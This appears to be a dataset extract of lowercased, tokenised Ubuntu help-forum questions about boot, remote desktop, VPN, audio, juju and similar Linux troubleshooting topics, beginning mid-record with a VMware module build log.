/tmp/modconfig-ozb2a1/vmnet-only/filter.c : at top level : /tmp/modconfig-ozb2a1/vmnet-only/filter.c:64:18 : warning : ‘vnetfilterhookfn’ used but never defined [ enabled by default ] static nf_hookfn vnetfilterhookfn ; ^ /tmp/modconfig-ozb2a1/vmnet-only/filter.c:213:1 : warning : ‘vnetfilterhookfn’ defined but not used [ -wunused-function ] vnetfilterhookfn ( unsigned int hooknum , // in : ^ make [ 2 ] : *** [ /tmp/modconfig-ozb2a1/vmnet-only/hub.o ] error 1 make [ 2 ] : *** waiting for unfinished jobs ... . make [ 2 ] : *** [ /tmp/modconfig-ozb2a1/vmnet-only/driver.o ] error 1 make [ 2 ] : *** [ /tmp/modconfig-ozb2a1/vmnet-only/filter.o ] error 1 make [ 2 ] : *** [ /tmp/modconfig-ozb2a1/vmnet-only/userif.o ] error 1 make [ 2 ] : *** [ /tmp/modconfig-ozb2a1/vmnet-only/netif.o ] error 1 make [ 2 ] : *** [ /tmp/modconfig-ozb2a1/vmnet-only/bridge.o ] error 1 make [ 1 ] : *** [ _module_/tmp/modconfig-ozb2a1/vmnet-only ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-27-generic' make : *** [ vmnet.ko ] error 2 make : leaving directory `/tmp/modconfig-ozb2a1/vmnet-only' unable to install all modules . see log for details . a google search for some of those compiler messages turns up absolutely nothing . what could i try next ? i 'm willing to switch kernel versions if it might help .
475315	authentication window does n't come up on the remote screen	i currently have xrdp and tightvnc server installed on my ubuntu machine , but when i access it over remote desktop , the authentication window does n't come up on the remote screen . it was coming up on the main screen , but no longer does . i followed this guide ( http : //c-nergy.be/blog/ ? p=5305 ) to get remote desktop working , and i 'm using mate 1.8 . i also had the same problem with linux mint 17 as well .
475316	redirecting output to std output or /dev/null depending on optional parameter	i have a script where you can run it just like this ./myscript and the output of some commands called inside the script are hidden , just like this : if mvn tomcat : deploy & > /dev/null ; then but if the script is executed like this ./myscript -v you can see the output of the commands , so it would be just : if mvn tomcat : deploy ; then so first , what 's the value of the standard output so i can store either that value or /dev/null in a variable in order to make the call like this : if mvn tomcat : deploy & > $ output ; then and what 's the best way to check the arguments ? do i need to literally check that $ 1 equals the literall -v or there 's a better approach ( since options are so commoly used , i guess there are different meachanisms ) ?
475322	ubuntu installer does n't detect partition on win7 ( warning : ca n't have a partition outside the disk ! )	i tried to look it up on the forum but i ca n't find a solution . i just got a pc laptop ( i come from macâś ) installed win7 and partition my hd in 3 parts , one for win7 , one unformatted for ubuntu , and one ntfs for data . the ubuntu installer does n't recognize the partitions though . what can i do ? my goal is to have a dual boot . thank you so much ! gparted screenshot note warning : ca n't have a partition outside the disk !
475328	no space for ubuntu to load	help ! i have ubuntu 14.04 dual booted with windows 7 , i was using ubuntu and writing files from one drive to another , however i didnt realise that i would soon run out of disk space on my laptop hard drive ( the destination for the copy ) . i left the copy to it and came back to a message saying that my disk space was low . i cancelled the copy and got to a command line , moved the files to an external drive so they were off the laptop drive . however , i rebooted and ubuntu wouldnt get passed the splash screen . i edited the advanced options in grub and got a text login screen . i logged in and can see my directories . i ran df -h and can see that /dev/sda5 shows as 100 % used and no free space . i cant work this out , as i moved all the files , so are they stuck in a tmp directory somewhere ? i tried sudo apt-get clean sudo apt-get autoremove and that didnt help matters . i deleted some files from my downloads folder ( there wasnt much in there to begin with , but some large files ) and i 've freed up about 45m . anywhere else i should be looking . i 've tried a few commands to search for large files ... sudo find / -size +50m -ls but its not showing anything of significance . any help appreciated . edit : full output of df -h and fdisk -l as follows :
475329	window size management : remote desktop into 1080p from 1080p ( how to )	i am remoting into a desktop that is 1080p from my 1080p ubuntu using remina ( sp ? ) remote desktop . because of the unity launcher/bar , i can not do the full width of the desktop . with its own remote desktop button ribbons and the ubuntu top ribbon , i can not get full height . i want to view the remote desktop full screen . so i tried using workspace switcher and making the window bigger than a full screen , and ubuntu kept trying to snap it to a full screen . specifically , i need to see the full height of the remote desktop all at once to do my work ( a tall , thin app ) . i am sure there is a way to do this so that i get the full window or what not ... but my ubuntu foo is weak .
475331	phpmyadmin is n't working ?	i installed apache2 and php with success , but when i want visit http : //localhost/phpmyadmin i got the following error : not found the requested url /phpmyadmin was not found on this server . apache/2.4.7 ( ubuntu ) server at localhost port 80 how can i fix this , because i need it working before i can continue . edit : now i have a new error : forbidden you do n't have permission to access /phpmyadmin on this server . apache/2.4.7 ( ubuntu ) server at localhost port 80
475342	openvpn speed is very slow	what im trying to do is vpn into my home server so that i can stream my music and videos when im away from home . so far ive setup openvpn on ubuntu server 12.04 and although it works , i can browse my home network and get online etc . the speeds are so slow that even small files constantly buffer . home connection speed is 30mb download 10mb upload , but when i connect through openvpn i get ~5mb download and 7mb upload . i dont expect to get the full speed but this seems far too slow . if anyone can help i 'd be very grateful , even if someone could just tell me what speeds to expect . below are my client and server config files . also in the tap adapter the mtu is set at 1500 server.conf port 1194 proto udp dev tun ca *.crt cert *.crt key *.key dh *.pem server 10.8.0.0 255.255.255.0 ifconfig-pool-persist ipp.txt push `` dhcp-option dns 192.168.1.1 '' keepalive 10 120 cipher none comp-lzo persist-key persist-tun status openvpn-status.log verb 3 mute 20 client.conf client dev tun proto udp remote *.*.* . * 1194 redirect-gateway dhcp-option dns 192.168.1.1 resolv-retry infinite nobind persist-key persist-tun ca *.crt cert *.crt key *.key ns-cert-type server cipher none comp-lzo verb 3 mute 20
475343	how can i see environment variables defined in .profile after lauching sudo codeblocks ?	i am developing code with c++ in code : :blocks . because my code needs to access mice devices i launch code : :blocks with sudo as superuser in an xterm i opened first . in the code i would like to read an environment variable i set myself containing the path from $ home pointing to the subdirectory from where the version x of the code can be found . i added att the end of the .bashrc file the statement itelescope= '' c++/itelescope_sn/version_000 '' . when opening a new xterm the variable is set as expected . next i launch c : :b as follows : sudo codeblocks in the code i read for example $ home or $ path without any problem . when i read $ itelescope it is empty . i searched on your forum and tried with the sudo option -e but without result . could someone help me out please ? thanks in advance ! ! !
475345	headphone/microphone combo jack not working on asus x501a	there is a combo audio output jack on my asus x501a , i have spent many hours trying to get it to work with no luck . when the computer had windows on it it worked fine , so it is not a hardware issue . example : when i plug a headphone in to it ( no microphone , just headphone ) , it recognizes a headphone/microphone device , neither working . any ideas on how to fix it ? details : ubuntu 14.04 asus x501a
475346	restore grub boot-loader	i have a disk partitioned this way : /dev/sda /dev/sda1 ntfs windows 8 /dev/sda2 ntfs reserved for the sys ( win 8 ) /dev/sda3 ext4 ubuntu 14.04 /dev/sda4 swap partition /dev/sda5 ntfs data store yesterday i installed ubuntu 14.04 choosing /dev/sda as the location where to install grub . after a restart i could boot only ubuntu and so decided to run boot-repair . the program asked me to delete every every boot loader from the disk ( i accepted as it was recommended ) . later i had to launch the install of grub with a command which failed . i checked the disk with the command frisk and noticed a star ( * ) indicating the presence of a boot loader installed in /dev/sda so decided to restart the system . now , when i start the system i get this message : '' file /boot/grub/i386-pc/normal.mod not found entering rescue mode ... '' how can i reinstall a boot-loader to dual-boot win8 and ubuntu ? thank you in advance for your help !
475348	juju bootstrap no data for cloud	i am trying to bootstrap juju onto a private openstack environment but when i try and bootstrap it i get an error saying index file has no data for cloud . here is the debug log : 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:388 fetchdata failed for `` http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/index.sjson '' : can not find url `` http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/index.sjson '' not found 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:362 can not load index `` http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/index.sjson '' : invalid url `` http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/index.sjson '' not found 2014-06-01 17:04:43 info juju.utils http.go:59 hostname ssl verification enabled 2014-06-01 17:04:43 info juju.utils http.go:59 hostname ssl verification enabled 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:388 fetchdata failed for `` http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/mirrors.json '' : can not find url `` http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/mirrors.json '' not found 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:465 no mirror index file found 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:366 read metadata index at `` http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/index.json '' 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:374 index file has no data for product name ( s ) [ `` com.ubuntu.cloud : server:12.04 : amd64 '' `` com.ubuntu.cloud : server:12.04 : armhf '' `` com.ubuntu.cloud : server:12.04 : i386 '' ] 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:388 fetchdata failed for `` http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/index.sjson '' : failed to get object images/streams/v1/index.sjson from container juju caused by : resource at http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/index.sjson not found caused by : request ( http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/index.sjson ) returned unexpected status : 404 ; error info : not foundthe resource could not be found . 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:362 can not load index `` http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/index.sjson '' : invalid url `` http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/index.sjson '' not found 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:388 fetchdata failed for `` http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/mirrors.json '' : failed to get object images/streams/v1/mirrors.json from container juju caused by : resource at http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/mirrors.json not found caused by : request ( http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/mirrors.json ) returned unexpected status : 404 ; error info : not foundthe resource could not be found . 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:465 no mirror index file found 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:366 read metadata index at `` http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images/streams/v1/index.json '' 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:374 index file has no data for product name ( s ) [ `` com.ubuntu.cloud : server:12.04 : amd64 '' `` com.ubuntu.cloud : server:12.04 : armhf '' `` com.ubuntu.cloud : server:12.04 : i386 '' ] 2014-06-01 17:04:43 info juju.utils http.go:59 hostname ssl verification enabled 2014-06-01 17:04:43 info juju.utils http.go:59 hostname ssl verification enabled 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:388 fetchdata failed for `` http : //cloud-images.ubuntu.com/releases/streams/v1/mirrors.sjson '' : can not find url `` http : //cloud-images.ubuntu.com/releases/streams/v1/mirrors.sjson '' not found 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:465 no mirror index file found 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:366 read metadata index at `` http : //cloud-images.ubuntu.com/releases/streams/v1/index.sjson '' 2014-06-01 17:04:43 debug juju.environs.simplestreams simplestreams.go:370 skipping index because of error getting latest metadata `` http : //cloud-images.ubuntu.com/releases/streams/v1/index.sjson '' : index file has no data for cloud { regionone http : //controller:5000/v2.0 } not found 2014-06-01 17:04:43 info juju.utils http.go:59 hostname ssl verification enabled 2014-06-01 17:04:43 info juju.utils http.go:59 hostname ssl verification enabled 2014-06-01 17:04:44 debug juju.environs.simplestreams simplestreams.go:388 fetchdata failed for `` http : //cloud-images.ubuntu.com/releases/streams/v1/mirrors.json '' : can not find url `` http : //cloud-images.ubuntu.com/releases/streams/v1/mirrors.json '' not found 2014-06-01 17:04:44 debug juju.environs.simplestreams simplestreams.go:465 no mirror index file found 2014-06-01 17:04:44 debug juju.environs.simplestreams simplestreams.go:366 read metadata index at `` http : //cloud-images.ubuntu.com/releases/streams/v1/index.json '' 2014-06-01 17:04:44 debug juju.environs.simplestreams simplestreams.go:370 skipping index because of error getting latest metadata `` http : //cloud-images.ubuntu.com/releases/streams/v1/index.json '' : index file has no data for cloud { regionone http : //controller:5000/v2.0 } not found 2014-06-01 17:04:44 error juju.provider.common bootstrap.go:118 bootstrap failed : can not start bootstrap instance : index file has no data for cloud { regionone http : //controller:5000/v2.0 } not found 2014-06-01 17:04:44 error juju.cmd supercommand.go:308 can not start bootstrap instance : index file has no data for cloud { regionone http : //controller:5000/v2.0 } not found here is my config for the openstack environment : openstack : type : openstack control-bucket : juju # use-floating-ip specifies whether a floating ip address is # required to give the nodes a public ip address . some # installations assign public ip addresses by default without # requiring a floating ip address . # use-floating-ip : true # use-default-secgroup specifies whether new machine instances # should have the `` default '' openstack security group assigned . # use-default-secgroup : true # network specifies the network label or uuid to bring machines up # on , in the case where multiple networks exist . it may be omitted # otherwise . # network : int-net # tools-metadata-url specifies the location of the juju tools and # metadata . it defaults to the global public tools metadata # location https : //streams.canonical.com/tools . # # tools-metadata-url : http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/tools # image-metadata-url specifies the location of ubuntu cloud image # metadata . it defaults to the global public image metadata # location https : //cloud-images.ubuntu.com/releases . # image-metadata-url : http : //10.0.0.100:8080/v1/auth_2469f191c2b445b9a57642e386b971b0/juju/images # image-stream chooses a simplestreams stream to select os images # from , for example daily or released images ( or any other stream # available on simplestreams ) . # # image-stream : `` released '' # auth-url defaults to the value of the environment variable # os_auth_url , but can be specified here . # auth-url : http : //controller:5000/v2.0 # tenant-name holds the openstack tenant name . it defaults to the # environment variable os_tenant_name . # tenant-name : admin # region holds the openstack region . it defaults to the # environment variable os_region_name . # region : regionone # the auth-mode , username and password attributes are used for # userpass authentication ( the default ) . # # auth-mode holds the authentication mode . for user-password # authentication , auth-mode should be `` userpass '' and username and # password should be set appropriately ; they default to the # environment variables os_username and os_password respectively . # auth-mode : userpass # username : admin # password : asd # for key-pair authentication , auth-mode should be `` keypair '' and # access-key and secret-key should be set appropriately ; they # default to the environment variables os_access_key and # os_secret_key respectively . # # auth-mode : keypair # access-key : < secret > # secret-key : < secret > i created image metadata by using juju metadata generate-image -i f5e006db-99e4-4ba3-96bf-a74c4d2b4161 -s trusty and created tools meta data using juju metadata generate-tools -d ./ then uploaded the folders to a container in swift called juju .
475351	firefox html5 video support	how can i get firefox to fully support html5 video ? the youtube html5 video player says that h.264 and media source extensions are not supported . is there any way i can enable all of these ?
475352	`` this computer currently has no detected operating systems . `` - ubuntu 14.04 install windows 8.1	i tried to install ubuntu alongside windows 8.1 . i disabled secure boot and made sure uefi was enabled and moved the dvd above windows boot manager in the boot order . but the ubuntu installation still does n't detect windows on the system . it gives me the options to erase all data on the hard drive or do something else , and if i do something else then i get a list of partitions . what else can i do to get the installation to detect windows ? thanks in advance for any help .
475355	mpd deletes previous played song from playlist	whenever i use mpc next or any other player ( ncmpcpp ) mpd will play the next song and will remove the previous song from the playlist ( generated by mpc add / ) . my mpd.conf is located at /etc/mpd.conf and i 've not found any directives associated to this annoying behavior . i 'd prefer that mpd jump to the next song but without removing any previous songs . any help is welcome .
475356	can i boot a ubuntu live install iso from a usb key on my powerbook g4 ?	so , i have a powerbook g4 17 '' right now and the ribbon cable connecting the odd drive to the motherboard is dead . somebody has torn the cable from the board and the cable is completely knackered . the connector on the board looks fine , as is the connector on the odd drive , but i have no way of getting a new ribbon cable at this time . so , is there any way of installing ubuntu onto the powerbook via a mounted iso on a usb drive ? the powerbook is already running ubuntu , but the previous owner had pulled the power half way through an update , so , it 's pretty much ruined . i have several versions of ubuntu for ppc already on my hard drive , but would there be a way of booting a mounted iso file from a usb drive through openfirmware or something ? if not , i guess i 'll buy a broken powerbook for a small amount of money and get the ribbon cable out of it , but if there is a way , i 'd greatly appreciate it if somebody could point me in the right direction : )
475359	huawei e3131 or e1550 istallation and connection on 14.04	i have two huawei sticks : e3131 and e1550 . i am quite new to ubuntu 14.04 , and tried loads of suggestions on this forum . but i am lost all the way . i ca n't make either of them install or work . all help is welcome , thanks a lot
475360	no menu bars after upgrading to 14.04lts	up graded from 13.10 to 14.04 using pop up upgrade recommendation . no problems during upgrade . after restarting and logging in , none of the enu bars are visible . displays desktop image and mouse can be seen , but unable to open anything or even shut it down properly . any idea what might have happened and/or how to fix it ?
475361	cursor moves when clicking with touchpad	this seems to be the issue in all linux distros i 've tried out . when i click on something using touchpad , the cursor moves a little bit , which is of course quite irritating . i know that it has something to do with synclient , but when i try to tweak it via terminal , i usually mess up some of the other settings ( such as mouse sensitivity etc . ) also , this was never an issue on windows . any thoughts ?
475366	unable to make bootable ubuntu flash drive	i 'm trying to dual boot my mac mini with ubuntu 14-1.04 . i do n't have a disc drive so i 'm using a flash drive to host the info and boot from that but i ca n't get this to work . i downloaded the .iso file for ubuntu and go through terminal using the hdiutil command to convert it to a .iso file . once i 've done this i have a file which is named ubuntu.iso.dmg . from there i found out the node of the usb drive which is disk1 , i use the sudo dd command to write the ubuntu.iso.dmg to the usb drive but it doesnt work , i do n't get any errors , it just says invalid argument . any help would be great .
475368	how to install pgfplots in ubuntu 14.04	i 'm running into the following error : ! latex error : file `pgfplots.sty ' not found . how should pgfplots be installed in ubuntu 14.04 ? i have installed the following packages already : texlive-full texlive-latex-extra texlive-bibtex-extra texlive-fonts-recommended pdflatex
475373	avconv assert error mpah.frame_size when trying to convert wav to mp3 under 14.04	my objective is to convert a wav file to mp3 on 14.04 ( 64-bit ) . the wav file is `` signed 16 bit little endian , rate 16000 hz , mono '' and is known to good . it plays fine with aplay , also converts successfully with ffmpeg on os x . thanks to this post , i learned ffmpeg is not part of the standard 14.04 repo , and that avconv is the replacement . i installed that with sudo apt-get install libav-tools here 's the error with aconv when i try to convert wav to mp3 : user @ l114 : /tmp $ avconv -i sound_2014-06-01_08-51-31.wav s1.mp3 avconv version 9.13-6:9.13-0ubuntu0.14.04.1 , copyright ( c ) 2000-2014 the libav developers built on may 9 2014 13:34:03 with gcc 4.8 ( ubuntu 4.8.2-19ubuntu1 ) [ wav @ 0x150cd40 ] max_analyze_duration reached guessed channel layout for input stream # 0.0 : mono input # 0 , wav , from 'sound_2014-06-01_08-51-31.wav ' : duration : 00:02:55.04 , bitrate : 256 kb/s stream # 0.0 : audio : pcm_s16le , 16000 hz , mono , s16 , 256 kb/s assertion mpah.frame_size > = ( 32 + 4 + 4 + 4 + 4 + 100 ) failed at /build/buildd/libav-9.13/libavformat/mp3enc.c:198 aborted ( core dumped ) how may i fix this ? or is this a bug to be logged ? it 's not impossible some incompatibilities exist on the box , due to other packages previously installed in attempts to get pyaudio working . that 's what created the wav file . any other info needed to help diagnose this ? p.s . before i learned of avconv this morning , i did manage to download a pre-built version of ffmpeg ( as tarball , not an installable package ) . however , the converted file was no good and sounds like really loud `` white noise '' . i 'm including the console output from ffpmeg below , in case this offers any additional clues . please know my preference is to solve this with avconv , since that 's the supported go-forward tool . user @ l114 : /tmp $ ffmpeg -i sound_2014-06-01_08-51-31.wav s1.mp3 ffmpeg version n-63624-g4ba8560 copyright ( c ) 2000-2014 the ffmpeg developers built on may 31 2014 05:37:43 with gcc 4.6 ( debian 4.6.3-1 ) configuration : -- prefix=/root/ffmpeg-static/64bit -- extra-cflags='-i/root/ffmpeg-static/64bit/include -static ' -- extra-ldflags='-l/root/ffmpeg-static/64bit/lib -static ' -- extra-libs='-lxml2 -lexpat -lfreetype ' -- enable-static -- disable-shared -- disable-ffserver -- disable-doc -- enable-bzlib -- enable-zlib -- enable-postproc -- enable-runtime-cpudetect -- enable-libx264 -- enable-gpl -- enable-libtheora -- enable-libvorbis -- enable-libmp3lame -- enable-gray -- enable-libass -- enable-libfreetype -- enable-libopenjpeg -- enable-libspeex -- enable-libvo-aacenc -- enable-libvo-amrwbenc -- enable-version3 -- enable-libvpx libavutil 52 . 87.100 / 52 . 87.100 libavcodec 55 . 65.100 / 55 . 65.100 libavformat 55 . 42.100 / 55 . 42.100 libavdevice 55 . 13.101 / 55 . 13.101 libavfilter 4 . 5.100 / 4 . 5.100 libswscale 2 . 6.100 / 2 . 6.100 libswresample 0 . 19.100 / 0 . 19.100 libpostproc 52 . 3.100 / 52 . 3.100 guessed channel layout for input stream # 0.0 : mono input # 0 , wav , from 'sound_2014-06-01_08-51-31.wav ' : duration : 00:02:55.04 , bitrate : 256 kb/s stream # 0:0 : audio : pcm_s16le ( [ 1 ] [ 0 ] [ 0 ] [ 0 ] / 0x0001 ) , 16000 hz , mono , s16 , 256 kb/s output # 0 , mp3 , to 's1.mp3 ' : metadata : tsse : lavf55.42.100 stream # 0:0 : audio : mp3 ( libmp3lame ) , 16000 hz , mono , s16p metadata : encoder : lavc55.65.100 libmp3lame stream mapping : stream # 0:0 - > # 0:0 ( pcm_s16le - > libmp3lame ) press [ q ] to stop , [ ? ] for help size= 513kb time=00:02:55.07 bitrate= 24.0kbits/s video:0kb audio:513kb subtitle:0kb other streams:0kb global headers:0kb muxing overhead : 0.042823 % ======== update 8-jun-2014 : discovered that ffmpeg is working fine after all . aquarius power 's suggestion to use mplayer was successful . i believe my mistake is in expecting aplay to play mp3 files , when my `` available formats : '' shows only these : - u8 - s16_le - s16_be - s32_le - s32_be - float_le - float_be - mu_law - a_law so ffmpeg does work , and mplayer does play the mp3 's . however , i 'd like to focus to getting an answer for the avconv assert problem . for those wanting sample files , see dropbox folder avconv : sound.wav - source wav file of several piano notes & silence avconv_output.txt - console output running avconv avconv.mp3 - 0 byte mp3 output file ffmpeg_output.txt - console output running ffmpeg ffmpeg.mp3 - working ffmpeg mp3 output file thanks everybody !
475374	window menus stick under window name . how to fix this ?	after experimenting with desktop environments and uninstalling and installing unity desktop all window menus are sticking under the window name switching the window menu behavior has no effect . is there a way to fix this ? i 'm also missing unitys nice welcome screen .
475377	how to upgrade ubuntu using live dvd ?	i have a very slow internet connection ( 200kbps ) , and do n't want to wait for it to install all packages from the web . is it possible to upgrade to 14.04 from 12.04 using the live dvd ?
475378	no interface in ubuntu on parallels	i 'm a complete n00b to ubuntu . i recently installed ubuntu in the parallels virtual machine ( version 9 ) on os x mavericks . it was working fine for a while . then it asked me if i wanted to update the system . i should have said no , apparently . i have deleted and reinstalled the virtual machine several times ( including reinstalling the old version that worked before ) , but in each one i get a bug . at one point i had a launcher on the screen , but when i did anything the screen would flash white and nothing would happen . most commonly , including in the current version ( 14.04 mac ) , i have no launcher and no pull-down menus available . i ca n't even press ctrl-alt-t ( or cmd-alt-t ) to get a terminal . all i can do is access the shortcuts on my desktop , which take me to a file manager where i ca n't find any applications ( including the terminal ) . i 'm not currently looking to use any apps . for now , i just want to get myself a damn terminal so i can compile things . i looked at this solution - unity does n't load , no launcher , no dash appears - and it does n't work ; pressing ctrl-alt-f1 at login appears to do nothing . should i deinstall parallels entirely ? is there something else i can do ?
475381	14.04 password suddenly not working	i was watching something on the computer last night and after 1 hour the screen locked ( which i set it to do ) . now all of a sudden my password is not working and i ca n't login . i have another account on the same computer that works fine , but i can not log in to my account . why did this happen and what can i do ?
475383	why do my display settings revert after i reboot ?	specifically , i have to set which of my two monitors is on the right every time i reboot . i 'm using gnome-control-center , in gnome3 . ubuntu 14.04 . why are my settings being reverted when i reboot ?
475384	problem during boot	my computer hangs on username and password screen .i actually followed the steps of adding username and password by editing the grub file and messed up somewhere near adding the user and password section.and when i try to boot now..it splashes with a user-password screen..i also tried to edit the recovery mode but ca n't succeed as it again pops the user-password screen after pressing 'e ' . i also tried live ubuntu cd but again the same thing ... btw i m using ubuntu 14.04 thanks..
475385	ubuntu volume control slider moves strangely	i have a really strange problem with the volume control of ubuntu 14.04 . when i move the slider it jumps from side to side and does not follow my mouse pointer . when i remove my mouse pointer from the volume slider , it moves itself randomly . eventually i realised that the problem occurs when i install the ubuntu sdk . i have no idea how to fix it . i searched all over the internet for a solution , but nothing helped . i do n't want to uninstall the ubuntu sdk because i want to write programs with it . i recorded a video of the strange problem - it is here .
475388	battery life in ubuntu 14.04	today i had fresh installation of ubuntu 14.04 previously i had ubuntu 12.04 and had 5 to 6 hours of battery backup even at constant work , but in 14.04 getting 3 hrs only , tried with tlp but no use . lspci : 0:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 02:00.0 network controller : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 )
475390	limiting file access for a huge number of users	the ubuntu is really great for it 's user management , every service can use it 's own system user : but should i use it for distribution ? let 's say i have a service , that i host , with many customers who only should be able to access it 's own files , should i use the ubuntu users ? what if the number of ubuntu users is reaching billions ? can i restrict file access for the users in another way ? virtual users ? my plan is just to limit the file access for each of `` my customers '' . they should be able to start processes running on my server who should not be able modify the system or other user files . the server must of course be secure . i know i can limit file access to each ubuntu user - but should i really use ubuntu-users ? let 's say i am hosting an apache server to customers - then the users can upload executable files , maybe designed to make bad things to my system , and those files should be executed as their user with limited file access . or if i host something else and they can execute other types of files . how do a proceed ? should i user the built-in ubuntu users or should a use something else ?
475400	system settings does n't respond	after installing ubuntu , my system settings worked well until after i installed compiz config settings manager and then it stopped responding to mouse clicks . i uninstalled compizconfig settings manager yet to no avail . i really need to work on my system settings . how do i get it to work again . thanks
475402	pro/wireless 3945abg wo n't connect	i hope someone can help me . i just purchased a dell latitude g630 windows 7 from a friend that just needed money . it 's fairly new , though i believe he got it refurbished because he said no disc 's came with it . anyway i was connected to his isp since he 's right next door , so i removed his profile and added mine from netgear . i have a netgear wnr834bv2 and have 2 other pc 's hooked up . i am able to connect the laptop hardwired . i am connected via wpa-psk [ tkip ] + wpa2-psk [ aes ] . every time it tries to connect it keeps asking me for my password , which is the correct one . i get a good signal and see my netgear , it just wo n't connect to it . i never had any problems and had my old laptop connected with no problems . i checked the driver and it showed it 's up to date . any idea what could possibly be wrong . also i do have the switch on . thank you
475403	can not access windows via grub after new dual-boot ubuntu install	i previously installed ubuntu on a computer that had windows xp on it and got it successfully to run alongside it . ( access both os systems ) now i installed ubuntu again on my msi notebook with windows 8.1 , and i can not access the grub without hitting escape on startup , and even then , i can no longer open windows . before all of this , i created a recovery point , file history and saved a back up on a external hard drive incase i did anything wrong . now how can i revert my computer back to it 's state before installation .
475406	reaching a login limit over ssh - how can i open more than 11 sessions ?	i have a ssh connection to my ubuntu vps . i use it to create a proxy tunnel and it works well . i use nethogs and `` w '' command to monitor the traffic . nothing bad happens until i reach @ pts/11 . when that happens , i can log in ( and proxy traffic works ) but i can not enter any commands . if i login with any account from the sudo group , it popup `` server refused to allocate pty '' and not let me write any thing . if i login with root account , it also popup another message : `` stdin is not a tty '' and still does n't let me write anything . and if i use w or nethogs again , i can only see the latest session is @ pts/11 and no @ pts/12 no matter how many more sessions i open . i tried a lot of different ways but still no luck . here is what i 've done so far : add `` maxsessions 300 '' to /etc/ssh/sshd_config add `` maxlogins unlimited '' and `` maxsyslogins unlimited '' to /etc/security/limits.conf reboot a lot of times . any ideas ?
475407	ubuntu 14.04 : vmware fusion 6.0.3 share is getting removed after newest update and reboot	i have a mac book pro , and run vmware fusion 6 on it to run ubuntu at the same time as osx . when i first attemped to do this , i could n't get the share to work after initial sudo apt-get update for versions 12.04 , 13.10 and 14.04a . none of them would allow me to share . finally , one day i saw 14.04 officially released , i downloaded it and tried it , and poof , the share worked after install as well as after update ! so there is something in this newest update that is messing up and removing my shared folder so that i can access my osx file directory . any ideas on how i can fix this ? maybe something to do with 'samba ' ? is there an update for that ?
475410	lot of `` file not found '' when using sudo find / -type s	in the attempt to understand why i keep getting the following error error : 'ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) ' while using the command sudo find / -type s the terminal prompted something like this find : ‘/proc/31348/task/31348/fd/5’ : no such file or directory find : ‘/proc/31348/task/31348/fdinfo/5’ : no such file or directory find : ‘/proc/31348/fd/5’ : no such file or directory find : ‘/proc/31348/fdinfo/5’ : no such file or directory what does this mean ?
